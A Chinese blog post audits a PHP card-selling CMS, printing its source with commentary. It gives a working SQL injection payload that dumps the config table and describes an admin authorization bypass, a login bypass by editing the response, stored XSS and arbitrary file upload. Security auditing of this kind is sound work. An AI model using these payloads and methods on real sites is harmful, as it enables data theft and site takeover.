某发卡cms的审计

最新推荐文章于 2023-12-20 10:57:28 发布
最新推荐文章于 2023-12-20 10:57:28 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 代码审计 文章标签: 某发卡cms的代码审计
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/89600071
版权

注意:代码审计的过程全写在注释里面

/ajax.php文件 存在SQL注入

<?php
include 'ayangw/common.php';  //这里看到包含了common.php文件 主要就是对于配置的加载 里面没有封装任何过滤函数
@header('Content-Type: application/json; charset=UTF-8');

if(empty($_GET['act'])){   // 这里我们发现也没有封装session类 仅仅是判断是否传参就可以造成访问  那么可以直接绕过
    exit("非法访问!");
}else{
    $act=$_GET['act'];
}

switch ($act){   //一个switch的分支  一共有4个不同的功能 我们就挑一个功能  selgo
    //异步获取商品
    case 'selgo':
        $select = "<option>请选择商品</option>";
        $tpID = $_POST['tyid'];  // 这里的tyid传参没有过滤导致下一行直接写入数据库里面 从而导致SQL注入
	        $sql = "select * from ayangw_goods where state =1 and tpId = ".$tpID;
        echo $sql; //打印下sql语句

        $res = $DB->query($sql);
       $i=1;
        while ($row =$DB->fetch($res)){
            $c = $DB->count("SELECT COUNT(id) from ayangw_km  where stat = 0 and gid =".$row['id']);
          $select.="<option id='".$row['id']."' value='".$row['gName']."'kc='".$c."'  title='".$row['price']."' alt = '".$row['gInfo']."'>".$row['gName']."</option>";
                  
        }
       exit('{"code":0,"msg":"'.$select.'"}');
        break; 
     //创建订单
     case 'create':
         $out_trade_no = $_POST['out_trade_no'];
         $gid = $_POST['gid'];
         $money = $_POST['money'];
         $rel = $_POST['rel'];
         $type = $_POST['type'];
         $sql = "insert into ayangw_order(out_trade_no,gid,money,rel,benTime,type) 
         values('{$out_trade_no}',{$gid},{$money},'{$rel}',now(),'{$type}')";
         $b = $DB->query($sql);
         if($b > 0){
             exit('{"code":0,"msg":"ok"}');
         }else{
             exit('{"code":-1,"msg":"no"}');
         }
         ;
     
     break;
     //查询卡密库存
     case 'selKm':
         $gid = $_POST['gid'];
         $sql = "select * from ayangw_km where stat = 0 and gid = ".$gid;
         $res =$DB->query($sql);
         if($row =  $DB->fetch($res)){
             exit('{"code":0,"msg":"ok"}');
         }else{
             exit('{"code":-1,"msg":"no"}');
         }
         ;break;
     //用户提取卡密
     case 'tqKm':
         $t = $_POST['t'];
         $sql = "select * from ayangw_km
         where out_trade_no ='{$t}' or trade_no = '{$t}' or rel = '{$t}'
         ORDER BY endTime desc
         limit 1";
        $res =$DB->query($sql);
        $ginfo = "";
        if($row =  $DB->fetch($res)){
            $sql2 = "select * from ayangw_goods where id =".$row['gid'];
            $res2 = $DB->query($sql2);
            $row2 = $DB->fetch($res2);
            $ginfo ="<tr><td id='td1'>".$row2['gName']."</td><td id='td2'>".$row['out_trade_no']."</td><td id='td3'>".$row['endTime']."</td><td id='td4'>".$row['km']."</td></tr>";
            exit('{"code":0,"msg":"'.$ginfo.'"}');
           
        }else{
            exit('{"code":-1,"msg":"无本条记录"}');
        }
         ;break;
     

    default: 
        exit('{"code":-2,"msg":"NOT"}');
        break;
}

payload

POST:tyid=1 union select 1,group_concat(0x7e,ayangw_k,0x7e,ayangw_v),3,4,5,6,7 from ayangw_config

标题 /admin/ajax.js 和ajax.php 越权

/admin/ajax.php


switch ($act){    // switch 两个分支  其实不止 我这里就举例了两个 因为这里的两个是不同的功能 其他的都类似 
    //验证登陆
    case 'checkLogin':
        $user = $_POST['user'];
        //echo $user;
        $pass = $_POST['pass']; 
        //echo $pass;
        if($user == $conf['admin'] && $pass == $conf['pwd']){
            exit('{"code":1,"msg":"登陆成功"}');
        }else{
            exit('{"code":0,"msg":"用户名或密码错误"}');
        }
        ;break;
        //删除订单
    case 'delOrd': 
        $id = $_POST['id'];
        $sql = "delete from ayangw_order where id = ".$id;
        $b = $DB->query($sql);
        if($b > 0){
            exit('{"code":1,"msg":"删除成功"}');
        }else{
            exit('{"code":-1,"msg":"删除失败"}');
        }
        ;break;
       //删除卡密

/admin/js/ayangw.js

//登陆验证
	$("#login_submit").click(function(){
		
		var user = $("#user").val();
		var pass = $("#pass").val();
		
		if(user == null || pass == null || user == "" || pass == ""){
			layer.msg('用户名和密码不能为空!');
			return false;
		}
		var ii = layer.load(2, {shade:[0.1,'#fff']});
		$.ajax({
			type : "POST",
			url : "ajax.php?act=checkLogin",
			data : {"user":user,"pass":pass},
			dataType : 'json',
			success : function(data) {
				 layer.close(ii);
				if(data.code == 1){
					layer.msg(data.msg);
					$.cookie("user",user);
					$.cookie("pass",pass);
					$.cookie("loginInfo",$.md5($.cookie("pass")));
					window.location.href='./';
				}else{
					layer.msg(data.msg);
					return false;
				}
			},
			error:function(data){
				 layer.close(ii);
				layer.msg('系统错误!');
				return false;
				}
		})
	})
	
	//删除订单
	$(".btndel").click(function(){
		if(confirm("确定要删除吗?")==false){
			return false;
		}
		var id = $(this).attr("id");
		var ii = layer.load(2, {shade:[0.1,'#fff']});
		$.ajax({
			type : "POST",
			url : "ajax.php?act=delOrd",
			data : {"id":id},
			dataType : 'json',
			success : function(data) {
				 layer.close(ii);
				if(data.code == 1){
					layer.msg(data.msg);
					location.reload();
					
				}else{
					layer.msg(data.msg);
					return false;
				}
			},
			error:function(data){
				 layer.close(ii);
				layer.msg('系统错误!');
				return false;
				}
		})
	})

因为ajax.php里面没有进行是否授权的检查所以ayangw.js 文件里面ajax可以直接请求后台 达到越权的目录

	$(".btndel").click(function(){
		if(confirm("确定要删除吗?")==false){
			return false;
		}
		var id = $(this).attr("id");
		var ii = layer.load(2, {shade:[0.1,'#fff']});
		$.ajax({
			type : "POST",
			url : "ajax.php?act=delOrd",
			data : {"id":id},
			dataType : 'json',
			success : function(data) {
				 layer.close(ii);
				if(data.code == 1){
					layer.msg(data.msg);
					location.reload();
					
				}else{
					layer.msg(data.msg);
					return false;
				}
			},
			error:function(data){
				 layer.close(ii);
				layer.msg('系统错误!');
				return false;
				}
		})
	})

直接发送这样一个ajax请求 里面的id为账单的id则可以达成越权的操作

同样的以上的ayangw.js的登陆验证的功能同样没有进行任何的验证 所以我们抓包在response里面把data.code改为1 则直接进入后台

后台XSS

前端可以重写js的函数
下单的联系方式
function checkLx(num){
var t=num;//这个就是我们要判断的值了
if(isNaN(t) && t !=""){
return true;
}else{
return false;
}
}
可以达到xss的目的

后台的任意文件上传

($_GET['mod']=='upimg'){
	echo '<div class="panel panel-primary"><div class="panel-heading"><h3 class="panel-title">更改首页LOGO</h3> </div><div class="panel-body">';


if($_POST['s']==1){
	$extension=explode('.',$_FILES['file']['name']);
	if (($length = count($extension)) > 1) {
		$ext = strtolower($extension[$length - 1]);
	}
	if($ext=='png'||$ext=='gif'||$ext=='jpg'||$ext=='jpeg'||$ext=='bmp')  //要是在这个范围内 那么$ext='png' 如果不是的话那么就任意后缀了
		$ext='png';
		copy($_FILES['file']['tmp_name'], ROOT.'/assets/imgs/logo.'.$ext);
		echo "成功上传文件!<br>(可能需要清空浏览器缓存才能看到效果)";
}
echo '<form action="set.php?mod=upimg" method="POST" enctype="multipart/form-data"><label for="file"></label><input type="file" name="file" id="file" /><input type="hidden" name="s" value="1" /><br><input type="submit" class="btn btn-primary btn-block" value="确认上传" /></form>*请上传3

直接任意文件上传

个人发卡网搭建源码_发卡代码审计
weixin_39760857的博客
12-14 563
前言好胸弟柠枫昨天dd了我一下,这不,叫我一起审计发卡cms君无戏言,最近也在整二进制,当然要跟我的好胸弟一起组队py一下,不知道我都多久没审了,吐咱语文也不是很好,各位看官就将就着看看就好,水文勿喷0x01. 首页功能点审计打开一看,发现不是mvc框架了,那就感觉没啥好看头了,对于发卡网这种功能一般情况下是没多少功能点让我getshell的(可能是我太菜,大佬也可以审计一波,交流交...
代码审计之彩虹代刷网系统1
08-03
在本文中,我们将深入探讨一个针对某代刷网站系统的代码审计案例,该系统可能存在多种安全问题,特别是SQL注入漏洞。 首先,【标题】提到的“代码审计之彩虹代刷网系统1”是一个关于网络安全专家对代刷网站进行安全...
发卡(另一版本)的代码审计
https://www.cnblogs.com/zpchcbd/
05-03 668
/other/codepay_notify.php 存在SQL注入 <?php define('SYSTEM_ROOT_E', dirname(__FILE__) . '/'); include '../ayangw/common.php'; // 包含一个文件 ksort($_POST); //排序post参数 reset($_POST); //内部指针指向数组中的第一个元素 $si...
cms的一次审计
xj28555的博客
06-14 941
前言 记一次某cms的一次比较全面的审计(除了插件部分,我觉得应该审计的差不多了),大佬们轻喷。 其实插件部分已经被爱吃猫的闲鱼师傅审计发到先知上了 文章地址:某cms代码审计引发的思考 细心的朋友读完我这篇文章应该就能发现其实是同一个cms 网站目录结构 . ├── 404.html ├── A(admin后台的一些文件,审计重点) ├── Conf(一些网站的配置文件,公共函数) ├── FrPHP(框架) ├── Home(用户的一些文件,审计核心) ├── Public(上传文件保存的
php发卡_发卡代码审计
weixin_36386044的博客
02-06 356
前言好胸弟柠枫昨天dd了我一下,这不,叫我一起审计发卡cms君无戏言,最近也在整二进制,当然要跟我的好胸弟一起组队py一下,不知道我都多久没审了,吐咱语文也不是很好,各位看官就将就着看看就好,水文勿喷0x01. 首页功能点审计打开一看,发现不是mvc框架了,那就感觉没啥好看头了,对于发卡网这种功能一般情况下是没多少功能点让我getshell的(可能是我太菜,大佬也可以审计一波,交流交...
cms代码审计RCE&艰难bypass(思路清奇)
weixin_42508548的博客
11-24 453
闲来无事挖挖漏洞,发现一个经过了一些过滤的漏洞,踩了无数的坑,然后冥思苦想了许多方法,终于找到了一个点,使得可以进行命令执行与getshell。这里的漏洞点不值一提,但是因为绕过方法挺好玩的,故在这里分享一下思路,大佬勿喷~ 思路不唯一,也希望有其他方法的话,大佬们可以不吝赐教,在评论区留下具体方法,谢谢大家~ 0x02 代码审计环境 此次代码审计采用的是phpstudy一键式搭建。 phpstudy下载地址:Windows版phpstudy下载 - 小皮面板(phpstudy)
TP5超强大某自动发卡平台真正企业级运营版源码
06-10
【标题】"TP5超强大某自动发卡平台真正企业级运营版源码"所涉及的知识点主要集中在PHP框架ThinkPHP5(简称TP5)以及一个用于在线销售数字产品的自动发卡平台的构建上。自动发卡平台是电商领域的一个特殊应用,主要...
泽宇发卡OR知宇发卡_发卡通杀.rar
04-09
《深入解析:发卡通杀——基于“泽宇发卡”与“知宇发卡”的漏洞利用》 在网络安全领域,发卡平台的安全性至关重要,因为它们涉及到大量的金融交易和用户数据。本文将深入探讨名为“泽宇发卡”和“知宇发卡”的发卡...
易语言-利用文档和某支付接口做的发卡软件
06-25
至于压缩包内的"利用文档和某支付接口做的发卡软件",这可能是项目源代码或者一份详细的开发指南。通过研究这份资源,开发者可以更直观地了解上述步骤的具体实现,有助于快速学习和提升易语言编程能力。 总的来说,...
某洋发卡网源码后台3套源码
08-12
【某洋发卡网源码后台3套源码】是一个针对在线销售数字商品,如游戏点卡、虚拟货币、会员卡等的平台源代码。发卡网是互联网上常见的一个业务模式,它允许商家快速、便捷地进行数字产品的销售与配送。这个源码包括了...
个人发卡网修复版.zip
04-25
个人发卡网源码 修复介绍:1.修复改价格bug2.增加商品介绍功能3.增加订单监控自动发送订单信息到用户邮箱4.增加支付接口5.修复授权6.邮箱发送改为本地订单发送邮件监控域名/ayangw/mon.php
PHP自动发卡平台源码 v7.9 开源版
02-03
PHP自动发卡平台源码 v7.9 开源版PHP自动发卡平台源码 v7.9 开源版PHP自动发卡平台源码 v7.9 开源版
[代码审计]Mini CMS V1.1-最新版
DYBOY-程序开发&网络安全
07-31 855
为什么最近老是在做代码审计呐?一是想要学习其他优秀开发者的架构和设计模式,二是挖掘一下开发者在开发过程中不严谨之处,作为前车之鉴。 有朋友就在问小东,哪儿找到这么多的CMS审计?这里说明一下,因为在代码审计方面还比较菜,只得大面积撒网,找小众的CMS审计学习,所以就写了一个小爬虫,把CNVD上的CMS列表厂商都给抓下来了。 爬虫源码如下: # title: 抓取CNVD漏洞CM...
php代码访问记录系统,对某PHP发卡系统代码审计记录
weixin_35084134的博客
03-29 344
最近都是PWN,审计,渗透并行,好久没看取证了…Local Env Setup有几个点说一下:第一个是cms要求php_curl扩展,当我修改了php.ini的扩展后,程序检测还是有点问题,所以把当前php的路径添加到环境变量中即可(或者换了php版本后就好了)。第二个就是php7.3.4运行该cms有问题,其他的测试了5.2、5.5、7.4均可。Code Excute Path Analysis...
“快看”cms v1.32代码审计
include_voidmain的博客
07-04 1328
CMS代码审计
如何审计一个冷门的cms
蚁景网安学院
01-20 297
点击"蓝字"关注,获取更多技术内容!前言刚开始代码审计多多少少会有种无从下手的感觉,想要通过自己的代码审计能力直接审计出漏洞未免有些困难。但是如果直接拿到一个cms开始审,刚开始可能富有激...
DuomiCMS代码审计-变量覆盖漏洞复现
最新发布
小小小屿屿屿的博客
12-20 1665
Duomicms是一个开源免费的系统,但是其中也存在漏洞,本文从代码审计角度去详细阐述其中存在的一个变量覆盖漏洞
CTF实例题
A1956936030的博客
09-17 1374
1.靶机目标 http://117.167.136.244:28057 2.靶机为post请求即用burpsuite抓包 打开burpsuite 3.用burpsuite对靶机进行抓包 找到购买卡密 进行购买卡密 打开intercept 抓包成功 找到注入点如下http://117.167.136.244:28057/ajax.php?act=selgo 4.用sqlmap注入 (1)找库:sqlmap -u “http://117.167.136.244:28057/ajax.php?act
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值